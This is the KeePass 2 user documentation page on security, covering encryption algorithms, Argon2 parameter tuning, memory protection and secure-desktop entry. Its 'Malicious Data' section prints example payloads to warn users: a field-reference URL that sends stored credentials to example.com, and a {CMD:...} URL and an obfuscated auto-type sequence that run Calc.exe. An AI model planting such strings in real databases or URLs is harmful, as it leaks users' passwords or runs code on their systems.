File: security.html

package info (click to toggle)
keepass2 2.57%2Bdfsg-1~bpo12%2B1
links: PTS, VCS
area: main
in suites: bookworm-backports
size: 14,520 kB
sloc: cs: 120,930; xml: 6,271; cpp: 322; sh: 53; makefile: 49
file content (717 lines) | stat: -rw-r--r-- 32,063 bytes
parent folder | download | duplicates (3)
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

	<meta http-equiv="X-UA-Compatible" content="IE=edge" />
	<meta http-equiv="expires" content="0" />
	<meta http-equiv="cache-control" content="no-cache" />
	<meta http-equiv="pragma" content="no-cache" />

	<meta name="author" content="Dominik Reichl" />

	
	

	<meta name="DC.title" content="Security - KeePass" />
	<meta name="DC.creator" content="Dominik Reichl" />
	<meta name="DC.type" content="Text" />
	<meta name="DC.format" content="text/html" />
	<meta name="DC.language" content="en" />
	<meta name="DC.rights" content="Copyright (C) 2003-2024 Dominik Reichl" />

	<meta name="robots" content="index, follow" />

	<title>Security - KeePass</title>
	<base target="_self" />
	<link rel="stylesheet" type="text/css" href="../../default.css" />

	
</head>
<body>




<table class="sectionheader"><tr>
<td><img src="../images/b64x64_file_locked.png" alt="" /></td>
<td><h1>Security</h1>
<p>Detailed information on the security of KeePass.</p></td>
</tr></table>

<ul>
<li><a href="#secencrypt">Database Encryption</a></li>
<li><a href="#seckeyhash">Key Hashing and Key Derivation</a></li>
<li><a href="#secdictprotect">Protection against Dictionary Attacks</a></li>
<li><a href="#secrandom">Random Number Generation</a></li>
<li><a href="#secmemprot">Process Memory Protection</a></li>
<li><a href="#secdesktop">Enter Master Key on Secure Desktop (Protection against Keyloggers)</a></li>
<li><a href="#seclocking">Locking the Workspace</a></li>
<li><a href="#secattach">Viewing/Editing Attachments</a></li>
<li><a href="#secplugins">Plugins</a></li>
<li><a href="#secselftests">Self-Tests</a></li>
<li><a href="#secspecattacks">Specialized Spyware</a></li>
<li><a href="#secmaldata">Malicious Data</a></li>
<li><a href="#secoptex">Options for Experts</a></li>
<li><a href="#secoptadm">Options for Administrators</a></li>
<li><a href="#secissues">Security Issues</a></li>
</ul>

<br />

<a name="secencrypt"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_password.png" alt="" />
Database Encryption</h2>

<p>KeePass database files are encrypted. KeePass encrypts the whole
database, i.e. not only your passwords, but also your user names, URLs,
notes, etc.</p>

<p>The following encryption algorithms are supported:</p>

<p>KeePass 1.x:</p>
<table class="tablebox75">
<tr><th style="width: 64.5%;">Algorithm</th>
<th style="width: 14%;">Key Size</th>
<th style="width: 21.5%;">Std. / Ref.</th></tr>

<tr><td>Advanced Encryption Standard (AES / Rijndael)</td>
<td>256 bits</td>
<td><a href="https://csrc.nist.gov/publications/fips/fips197/fips-197.pdf"
target="_blank">NIST FIPS 197</a></td></tr>

<tr><td>Twofish</td>
<td>256 bits</td>
<td><a href="https://www.schneier.com/academic/twofish/"
target="_blank">Info</a></td></tr>
</table>

<p>KeePass 2.x:</p>
<table class="tablebox75">
<tr><th style="width: 64.5%;">Algorithm</th>
<th style="width: 14%;">Key Size</th>
<th style="width: 21.5%;">Std. / Ref.</th></tr>

<tr><td>Advanced Encryption Standard (AES / Rijndael)</td>
<td>256 bits</td>
<td><a href="https://csrc.nist.gov/publications/fips/fips197/fips-197.pdf"
target="_blank">NIST FIPS 197</a></td></tr>

<tr><td>ChaCha20</td>
<td>256 bits</td>
<td><a href="https://datatracker.ietf.org/doc/html/rfc8439"
target="_blank">RFC 8439</a></td></tr>

<tr><td colspan="3">There exist various
<a href="https://keepass.info/plugins.html" target="_blank">plugins</a>
that provide support for additional encryption algorithms,
including but not limited to Twofish, Serpent and GOST.</td></tr>
</table>

<p>These well-known and thoroughly analyzed algorithms are
considered to be very secure.
AES (Rijndael) became effective as a U.S. federal government standard
and is approved by the National Security Agency (NSA)
for top secret information.
Twofish was one of the other four AES finalists.
ChaCha20 is the successor of the Salsa20 algorithm (which is included in the
<a href="https://www.ecrypt.eu.org/stream/"
target="_blank">eSTREAM portfolio</a>).</p>

<p>The block ciphers are used in the Cipher Block Chaining (CBC)
<a href="https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation"
target="_blank">block cipher mode</a>.
In CBC mode, plaintext patterns are concealed.</p>

<p>An <a href="https://en.wikipedia.org/wiki/Initialization_vector"
target="_blank">initialization vector</a> (IV) is generated
<a href="#secrandom">randomly</a> each time
a database is saved. Thus, multiple databases encrypted with the same
master key (e.g. backups) are no problem.</p>

<p>Data authenticity and integrity:</p>






The authenticity and integrity of the data is ensured using
a HMAC-SHA-256 hash of the ciphertext (Encrypt-then-MAC scheme).


<!-- 
<br />
<br /><br /> -->

<p>See also:</p>

<ul>
<li><a href="https://keepass.info/help/kb/kdbx.html"
target="_blank">KDBX file format specification</a>.</li>
<li><a href="faq_tech.html#fips2x">FIPS mode support</a>.</li>
</ul>

<br />

<a name="seckeyhash"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_password.png" alt="" />
Key Hashing and Key Derivation</h2>

<p>SHA-256 is used for compressing the components
of the <a href="keys.html">master key</a>
(consisting of a master password, a key file, a Windows user account key
and/or a key provided by a plugin) to a 256-bit key <em>K</em>.</p>

<p>SHA-256 is a cryptographic hash function that is considered to be
very secure. It <!-- has been designed by the National Security Agency (NSA),
and -->has been standardized in
<a href="https://dx.doi.org/10.6028/NIST.FIPS.180-4"
target="_blank">NIST FIPS 180-4</a>.
The <a href="https://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html"
target="_blank">attack against SHA-1</a> discovered in 2005 does not affect
the security of SHA-256.</p>

<p>In order to generate the key for the encryption algorithm,
<em>K</em> is transformed using a key derivation function (with
a random salt). This prevents precomputation of keys and makes dictionary
and guessing attacks harder. For details, see the section
'<a href="#secdictprotect">Protection against Dictionary Attacks</a>'.</p>

<br />

<a name="secdictprotect"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_password.png" alt="" />
Protection against Dictionary Attacks</h2>

<p>KeePass features a protection against dictionary and guessing attacks.</p>

<p>Such attacks cannot be prevented, but they can be made harder.
For this, the key <em>K</em> derived from the user's master key
(see <a href="#seckeyhash">above</a>) is transformed using a
key derivation function with a random salt.
This prevents a precomputation of keys and adds a work factor
that the user can make as large as desired
to increase the computational effort of a dictionary or guessing attack.</p>

<p>Multiple key derivation functions are supported. In the database
settings dialog, you can select one and specify certain parameters
for it.</p>

<p>By clicking the '1 Second Delay' button in the database settings
dialog, KeePass computes the number of iterations that results in a
1 second delay when loading/saving a database.
Furthermore, KeePass 2.x has a button 'Test' that performs a key
transformation with the specified parameters (which can be cancelled)
and reports the required time.</p>

<p>The key transformation may require more or less time on other
devices. If you are using KeePass or a port of it on other devices,
make sure that all devices are fast enough (and have sufficient memory)
to load the database with your parameters within an acceptable time.</p>

<p>Supported key derivation functions:</p>

<ul class="withspc">
<li><strong>AES-KDF</strong> (KeePass 1.x and 2.x):<br />
This key derivation function is based on iterating
AES.<!-- This key derivation function splits <em>K</em> into two 128-bit halves
(the block size of AES is 128 bits) and iteratively encrypts them
using AES with a random 256-bit key (transformation salt).
The key derivation is finalized using one SHA-256 computation
that combines the two halves. -->

<p>In the database settings dialog, you can change the number of
iterations. The more iterations, the harder are dictionary and guessing
attacks, but also database loading/saving takes more time (linearly).</p>

On Windows Vista and higher, KeePass can use Windows' CNG/BCrypt API
for the key transformation, which is about 50% faster than the
key transformation code built-in to KeePass.</li>

<li><strong>Argon2</strong> (KeePass 2.x only):<br />
<a href="https://github.com/p-h-c/phc-winner-argon2#argon2" target="_blank">Argon2</a>
is the winner of the <a href="https://www.password-hashing.net/"
target="_blank">Password Hashing Competition</a>.
The main advantage of Argon2 over AES-KDF is that it provides a better
resistance against GPU/ASIC attacks (due to being a memory-hard function).

<p>The official specification of the Argon2 algorithm defines three
variants: Argon2d, Argon2id and Argon2i.
Argon2i is the least suitable variant in our case (KeePass database file);
therefore, KeePass only offers Argon2d and Argon2id.</p>

<p>Argon2d provides the best resistance against GPU/ASIC attacks.
The resistance of Argon2id against GPU/ASIC attacks is somewhat weaker,
but Argon2id additionally makes certain side-channel attacks slightly harder.</p>

<p>Side-channel attacks try to gain information from a system by
observing its behavior (e.g. the duration and the power consumption of
certain operations). On servers, side-channel attacks are a real threat.
On client devices (PCs), side-channel attacks are more difficult (more
noise, etc.); there are ideas how some might work in theory, but we are
not aware of any real attack in practice.
For example, the attack described in the article
'<a href="https://www.cs.columbia.edu/2015/spy-in-the-sandbox/"
target="_blank">The Spy in the Sandbox / Side-Channel Attacks in Web Browsers</a>'
was interesting (JavaScript code was able to detect certain user interactions),
but not a real threat (no extraction of sensitive data, as mentioned
explicitly in the article). This may or may not change in the future.
Note that this has nothing to do with cloud storage; KeePass encrypts/decrypts
a database file on a client device, and thus it is irrelevant where the
database file is stored (for side-channel attacks).
Furthermore, there are side-channel attacks that neither Argon2d nor Argon2id
(nor Argon2i, nor any other key derivation function) protects against (e.g.
<a href="https://en.wikipedia.org/wiki/Spectre_(security_vulnerability)"
target="_blank">Spectre</a>/<a href="https://en.wikipedia.org/wiki/Meltdown_(security_vulnerability)"
target="_blank">Meltdown</a> side-channel attacks, which allow
spyware to read all memory).</p>

<p>In the case of KeePass, we currently recommend Argon2d instead
of Argon2id, because we believe that a better protection against a
really existing threat (password cracking using GPUs/ASICs is state
of the art) is more important than a protection against certain
side-channel attacks that may or may not become a problem on client
devices in the future.
If you worry about side-channel attacks (and are willing to sacrifice
some GPU/ASIC resistance) or if you are developing a software where
side-channel attacks could be a problem (e.g. a server service that
operates with KeePass database files), use Argon2id.</p>

<p>Side note: the IRTF CFRG Argon2 Internet standard recommends
Argon2id by default. For server applications, Argon2id is in general
indeed more suitable than Argon2d, but our situation (client device)
is different, as mentioned above.</p>

<p>The number of iterations scales linearly with the required time.
By increasing the memory parameter, GPU/ASIC attacks become
harder (and the required time increases).
The parallelism parameter specifies how many threads should be used.</p>

<p>We recommend the following procedure for determining the
Argon2 parameters:</p>
<ol class="withspc">
<li>Set the number of iterations to 2.</li>

<li>Find out the RAM size of each of your devices on which you want to
open your database file. Let <i>M</i> be the minimum of these sizes.
Set the memory parameter to min(<i>M</i>/2, 1 GB)
(i.e. use the half of <i>M</i>, if it is less than 1 GB, otherwise use 1 GB).
<ul>
<li>Example 1: if you have a PC with 32 GB RAM and a mobile phone
with 1 GB RAM (on which you want to open your database file),
set the memory parameter to 500 MB.</li>
<li>Example 2: if you have a PC with 32 GB RAM and a PC with 8 GB RAM,
set the memory parameter to 1 GB.</li>
</ul>
On Windows 10 and higher, the RAM size can be found in the system settings
&rarr; 'System' &rarr; 'About'.</li>

<li>Find out the number of logical processors of each of your devices.
Set the parallelism parameter to the minimum of these numbers.
On Windows 10 and higher, the number of logical processors can be found
in the Task Manager (right-click onto the taskbar &rarr; 'Task Manager')
on the 'Performance' tab page.</li>

<li>Click the 'Test' button.
<ul>
<li>If the key transformation takes too much time (longer than you are
willing to wait when opening/saving the database file, e.g. more than
1 second), cancel it, decrease the memory parameter and click
the 'Test' button again.
Repeat this until the required time is acceptable.</li>

<li>If the key transformation takes too few time (in the case of 1 GB memory),
increase the number of iterations and click the 'Test' button again.
Repeat this until you like the required time.</li>
</ul></li>

<li>Save the database file and try to open it on each of your other
devices. If this takes too long on one of the devices,
decrease the number of iterations (recommendation: not less than 2)
and/or decrease the memory parameter, and try it again.</li>
</ol>

<p>When clicking the '1 Second Delay' button, KeePass uses a different
strategy for determining the parameters (relatively low values for the
memory and parallelism parameters, relatively high number of iterations),
because KeePass does not know the RAM and processor details of your other
devices (the default values should be compatible with most devices).
If you know these details, it is recommended to follow the
procedure above instead.</p>
</li>

<!-- <li><strong>Plugins</strong> (KeePass 2.x only):<br />
<a href="https://keepass.info/plugins.html" target="_blank">Plugins</a>
can provide additional key derivation functions.</li> -->
</ul>

<p><b>Argon2 on iOS.</b> If you are using a KeePass-compatible app
on iOS, please note the following limitation of iOS.
If the app uses a lot of RAM (e.g. due to using Argon2 with a
large memory parameter), then AutoFill may not work.
In this case, we recommend to use a relatively low value for the
Argon2 memory parameter (64 MB or less, depending on the app and the
database size) and a relatively high number of iterations.</p>

<p><b>KeePassX.</b> In contrast to KeePass, the Linux port KeePassX
only partially supports protection against dictionary and guessing attacks.</p>

<br />

<a name="secrandom"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_binary.png" alt="" />
Random Number Generation</h2>

<p>KeePass first creates an entropy pool using various entropy sources
(including random numbers generated by the system cryptographic provider,
current date/time and uptime, cursor position, operating system version,
processor count, environment variables, process and memory statistics,
current culture, a new random GUID, etc.).</p>

<p>The random bits for the high-level generation methods are generated
using a cryptographically secure pseudo-random number generator
(based on SHA-256/SHA-512 and ChaCha20) that is initialized using the entropy pool.</p>

<br />

<a name="secmemprot"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_file_locked.png" alt="" />
Process Memory Protection</h2>

<p>While KeePass is running, sensitive data is stored encryptedly
in the process memory.
This means that even if you would dump the KeePass process memory to disk,
you could not find any sensitive data.
For performance reasons, the process memory protection only applies
to sensitive data; sensitive data here includes for instance the master key
and entry passwords, but not user names, notes and file attachments.
Note that this has nothing to do with the
<a href="#secencrypt">encryption of database files</a>;
in database files, all data (including user names, etc.) is encrypted.</p>

<p>Furthermore, KeePass erases all security-critical memory (if possible)
when it is not needed anymore, i.e. it overwrites these memory areas
before releasing them.</p>

<p>KeePass uses the Windows DPAPI for encrypting sensitive data in memory
<!-- https://msdn.microsoft.com/en-us/library/windows/desktop/aa380262.aspx -->
<!-- https://docs.microsoft.com/en-us/windows/win32/api/dpapi/nf-dpapi-cryptprotectmemory -->
(via <a href="https://learn.microsoft.com/en-us/windows/win32/api/dpapi/nf-dpapi-cryptprotectmemory"
target="_blank">CryptProtectMemory</a> /
<!-- https://msdn.microsoft.com/en-us/library/system.security.cryptography.protectedmemory.aspx -->
<!-- https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.protectedmemory -->
<a href="https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.protectedmemory"
target="_blank">ProtectedMemory</a>).
With DPAPI, the key for the memory encryption is stored in a
secure, non-swappable memory area managed by Windows.
DPAPI is available on Windows 2000 and higher.
KeePass 2.x always uses DPAPI if it is available; in KeePass 1.x, it can be
disabled (in the advanced options; DPAPI usage is enabled by default).
If DPAPI is unavailable or disabled, KeePass falls back to encrypting the
process memory using ChaCha20 with a random key; note that this is less secure
than DPAPI, because the key is also stored in swappable process memory.
On Unix-like systems, KeePass 2.x uses ChaCha20, because Mono does not provide
any effective memory protection method.</p>

<p>For some operations, KeePass must make sensitive data available
unencryptedly in the process memory. For example, in order to show a password
in the standard list view control provided by Windows, KeePass must supply
the cell content (the password) as unencrypted string
(unless hiding using asterisks is enabled).
Operations that result in unencrypted data in the process memory include,
but are not limited to: displaying data (not asterisks) in standard controls,
transferring data to/from other applications (via the clipboard, drag&amp;drop,
StdIn/StdOut, ...),
replacing placeholders (e.g. during auto-type),
searching data (e.g. the commands in the 'Find' menu that involve sensitive data),
importing/exporting files (except KDBX) and loading/saving unencrypted files.
Windows and .NET may make copies of the data (in the process memory)
that cannot be erased by KeePass.</p>

<br />

<a name="secdesktop"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_kgpg.png" alt="" />
Enter Master Key on Secure Desktop (Protection against Keyloggers)</h2>

<p>KeePass 2.x has an option (in 'Tools' &rarr; 'Options' &rarr; tab 'Security')
to show master key dialogs on a different/secure desktop
(supported on Windows 2000 and higher), similar to Windows'
User Account Control (UAC). Almost no keylogger works on a secure desktop.</p>

<p>The option is turned off by default for compatibility reasons.</p>

<p>More information can be found on the
<a href="https://keepass.info/help/kb/sec_desk.html" target="_blank">Secure Desktop</a>
help page.</p>


Note that auto-type can be secured against keyloggers, too, by using
<a href="../v2/autotype_obfuscation.html">Two-Channel Auto-Type Obfuscation</a>.


<p><i>Note: KeePass was one of the first password managers that allow
entering the master key on a different/secure desktop!</i></p>

<br />

<a name="seclocking"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_file_locked.png" alt="" />
Locking the Workspace</h2>

<p>When locking the workspace, KeePass closes the database file and
only remembers its path and certain view parameters.</p>

<p>This provides maximum security: unlocking the
workspace is as hard as opening the database file the normal way. Also, it prevents
data loss (the computer can crash while KeePass is locked, without doing any damage
to the database).</p>

<p>When a sub-dialog is open, the workspace may not be locked;
for details, see the <a href="faq_tech.html#noautolock">FAQ</a>.</p>

<br />

<a name="secattach"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_desktop.png" alt="" />
Viewing/Editing Attachments</h2>

<p>KeePass 2.x has an internal viewer/editor for attachments.
For details how to use it for working with texts, see
'<a href="faq_tech.html#rtftext">How to store and work with large amounts of
(formatted) text?</a>'.</p>

<p>The internal viewer/editor works with the data in main memory.
It does not extract/store the data onto disk.</p>

<p>When trying to open an attachment that the internal viewer/editor cannot handle
(e.g. a PDF file), KeePass extracts the attachment to a (EFS-encrypted)
temporary file and opens it using the default application associated with this file type.
After finishing viewing/editing, the user can choose between importing
or discarding any changes made to the temporary file.
In any case, KeePass afterwards securely deletes the temporary file
(including overwriting it).</p>

<br />

<a name="secplugins"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_blockdevice.png" alt="" />
Plugins</h2>




<p>A separate page exist about the security of plugins:
<a href="../v2/plugins.html">Plugin Security</a>.</p>


<br />

<a name="secselftests"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_kblackbox.png" alt="" />
Self-Tests</h2>

<p>Each time you start KeePass, the program performs a quick self-test to see
whether the encryption and hash algorithms work correctly and pass
their test vectors. If one of the algorithms does not pass its test vectors,
KeePass shows a security exception dialog.</p>

<br />

<a name="secspecattacks"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_openterm.png" alt="" />
Specialized Spyware</h2>

<p>This section gives answers to questions like the following:</p>

<ul>
<li>Would encrypting the configuration file increase security by preventing
changes by a malicious program?</li>
<li>Would encrypting the application (executable file, eventually together
with the configuration file) increase security by preventing changes
by a malicious program?</li>
<li>Would an option to prevent plugins from being loaded increase security?</li>
<li>Would storing security options in the database (to override the settings of
the KeePass instance) increase security?</li>
<li>Would locking the main window in such a way that only auto-type is allowed
increase security?</li>
</ul>

<p>The answer to all these questions is: no. Adding any of these features
would not increase security.</p>

<p>All security features in KeePass protect against <em>generic</em> threats like
keyloggers, clipboard monitors, password control monitors, etc. (and against
non-runtime attacks on the database, memory dump analyzers, ...).
However in all the questions above we are assuming that there is a spyware
program running on the system that is specialized on attacking KeePass.</p>

<p>In this situation, the best security features will fail.
This is law #1 of the
<!-- https://technet.microsoft.com/en-us/library/cc722487.aspx -->
<!-- https://technet.microsoft.com/en-us/library/hh278941.aspx -->
<a href="https://web.archive.org/web/20180529154650/https://technet.microsoft.com/en-us/library/hh278941.aspx"
target="_blank" rel="nofollow">Ten Immutable Laws of Security</a>
(Microsoft TechNet article; see also the
Microsoft TechNet article
<!-- https://technet.microsoft.com/en-us/library/2008.10.securitywatch.aspx -->
<!-- https://docs.microsoft.com/en-us/previous-versions/technet-magazine/cc895640(v=msdn.10) -->
<a href="https://learn.microsoft.com/en-us/previous-versions/technet-magazine/cc895640(v=msdn.10)"
target="_blank">Revisiting the 10 Immutable Laws of Security, Part 1</a>):<br />
<i>&quot;If a bad guy can persuade you to run his program on your
computer, it's not your computer anymore&quot;</i>.</p>

<p>For example, consider the following very simple spyware specialized
for KeePass: an application that waits for KeePass to be started, then hides
the started application and imitates KeePass itself. All interactions
(like entering a password for decrypting the configuration, etc.) can be
simulated.
The only way to discover this spyware is to use a program that the spyware
does not know about or cannot manipulate (secure desktop);
in any case it cannot be KeePass.</p>

<p>For protecting your PC, we recommend using an anti-virus software.
Use a proper firewall, only run software from trusted sources,
do not open unknown e-mail attachments, etc.</p>

<br />

<a name="secmaldata"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_enhanced_browsing.png" alt="" />
Malicious Data</h2>

<p>The user should check all data that he enters and/or runs.</p>

<p>If you enter/run data without checking it first, this can lead to
security problems (like for instance a disclosure of sensitive data
or an execution of malicious code). This is a general principle;
it applies to most applications, not only to KeePass.</p>

<p>Examples:</p>
<ul class="withspc">
<li>The <a href="autourl.html">URL field</a> of an entry supports running
a <a href="autourl.html#cmdln">command line</a>.
So, if you (enter and) run a URL without checking it first,
you might run a malicious program/code.</li>

<li>When running a URL, a malicious <a href="autourl.html#override">URL override</a>
(global or entry-specific) may be executed instead, if you did not check it.</li>

<li>KeePass supports <a href="placeholders.html">placeholders</a>.
All regular placeholders are of the form '<code>{...}</code>', and
<a href="placeholders.html#envvars">environment variables</a>
are of the form '<code>%...%</code>'.
All data should be checked for malicious placeholders and environment variables.

<ul>
<li><a href="fieldrefs.html">Field references</a> can insert data of
other entries into the current data. For example, if you have a Facebook account,
entering and running the following URL might send your Facebook user name
and the password to the 'example.com' server:<br />
<code>https://example.com/?u={REF:U@T:Facebook}&amp;p={REF:P@T:Facebook}</code></li>

<li>The <a href="placeholders.html#cmd"><code>{CMD:...}</code> placeholder</a>
runs a command line. For example, the following URL opens
'https://example.com/' and runs 'Calc.exe':<br />
<code>https://example.com/{CMD:/Calc.exe/W=0/}</code></li>
</ul>

<a href="placeholders.html#texttrf">Text transformation placeholders</a>
may be used to obfuscate parts of the data.</li>

<li>The following <a href="autotype.html">auto-type</a> sequence
performs a login and additionally runs 'Calc.exe':<br />
<code>{USERNAME}{TAB}{PASSWORD}{ENTER}{VKEY
91}{T-CONV:/%43%61%6C%63%2E%65%78%65/Uri-Dec/}{VKEY 13}</code><br />
This sequence typically only works on a Windows system, but similar
sequences can be constructed for other operating systems
(like Linux and MacOS).</li>

<li>If you specify weak <a href="#secdictprotect">key transformation</a>
settings suggested by an attacker, this might make it easier for the
attacker to decrypt/open your database.</li>

<li>If you enter/use a <a href="pwgenerator.html">password generator</a>
profile (suggested by an attacker) that allows weak passwords only,
accounts using such weak passwords may not be well protected.</li>

<li>Using the <a href="https://keepass.info/help/v2/xml_replace.html"
target="_blank">XML Replace</a> feature with malicious parameters may
result in a malicious modification of data in your database.</li>

<li>Pasting/entering malicious <a href="https://keepass.info/help/v2/triggers.html"
target="_blank">triggers</a> in the triggers dialog without checking
them can result in security problems.</li>
</ul>

<p>If the user checks the data that he enters/runs, none of the
&quot;attacks&quot; above works. Entering data is a manual operation
(i.e. an attacker cannot do this himself), and only the user can
decide whether the resulting effect is intended or not.
Showing warning/confirmation dialogs all the time would not be reasonable.</p>

<p>When opening a database that has been created/modified by
someone else, you should carefully check all data that you want to use.
If you do not fully trust the creator of the database, do not
open any files attached to entries.</p>

<br />

<a name="secoptex"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_file_locked.png" alt="" />
Options for Experts</h2>

<p>Most security options can be configured in the options dialog of
KeePass (menu 'Tools' &rarr; 'Options') and in the database settings
dialog (menu 'File' &rarr; 'Database Settings').</p>

<p>However, in KeePass 2.x, there additionally are a few security options
for experts that cannot be configured in the user interface.
For example, KeePass can protect its process with a
discretionary access control list (DACL), and
its windows can be protected against certain screen capture operations.</p>

<p><img src="../images/b16x16_warning.png" class="textimg" alt="Warning" />
Activating these options for experts may result in compatibility problems and
may make KeePass unusable. Therefore, these options can only be activated by
editing the configuration file manually (using an XML or text editor).
This ensures that users know how they can deactivate the problematic options
(by editing the configuration file once more)
in order to make KeePass usable again.</p>

<p>If you know how the <a href="configuration.html">configuration</a>
system of KeePass works, then see the
<a href="https://keepass.info/help/v2_dev/customize.html#opt" target="_blank">customization</a>
help page, on which these options are documented.</p>

<br />

<a name="secoptadm"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_file_locked.png" alt="" />
Options for Administrators</h2>

<p>Administrators can enforce certain settings, disallow certain functions,
specify requirements for master passwords, and much more.
Details can be found on the following help pages:</p>

<ul>
<li><a href="configuration.html">Configuration</a>.</li>
<li><a href="https://keepass.info/help/kb/config_enf.html" target="_blank">Enforced Configuration</a>.</li>
<li><a href="https://keepass.info/help/v2_dev/customize.html" target="_blank">Customization (KeePass 2.x)</a>,
<a href="https://keepass.info/help/v1_dev/customize.html" target="_blank">Customization (KeePass 1.x)</a>.</li>
<li><a href="https://keepass.info/help/v2/policy.html" target="_blank">Application Policy (KeePass 2.x)</a>.</li>
</ul>

<br />

<a name="secissues"></a>
<h2 class="sectiontitle"><img src="../images/b16x16_message.png" alt="" />
Security Issues</h2>

<p>For a list of security issues, their status and clarifications, please see the page
<a href="https://keepass.info/help/kb/sec_issues.html"
target="_blank">Security Issues</a>.</p>

</body></html>